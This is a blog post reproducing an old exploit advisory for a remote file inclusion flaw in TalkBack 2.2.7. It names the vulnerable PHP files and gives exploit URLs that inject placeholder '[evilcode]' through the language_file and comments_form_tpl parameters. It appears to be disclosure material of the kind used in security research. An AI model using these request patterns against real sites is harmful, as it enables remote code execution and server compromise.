LFI to RCE via access_log injection

on
18

TalkBack 2.2.7 - RFI

on 

[o] TalkBack 2.2.7 Remote File Include Vulnerability
Software : TalkBack version 2.2.7
Vendor   : http://www.scripts.oldguy.us/talkback
Author   : NoGe


[o] Vulnerable file
comments-display-tpl.php
include $language_file;
include $config['comments_form_tpl'];
addons/separate-comments-mod/my-comments-display-tpl.php
include $language_file;


[o] Exploit
http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4640


Comments

labatterie said…
The preparing to do some research about that.
December 2, 2010 at 9:03 PM
Post a Comment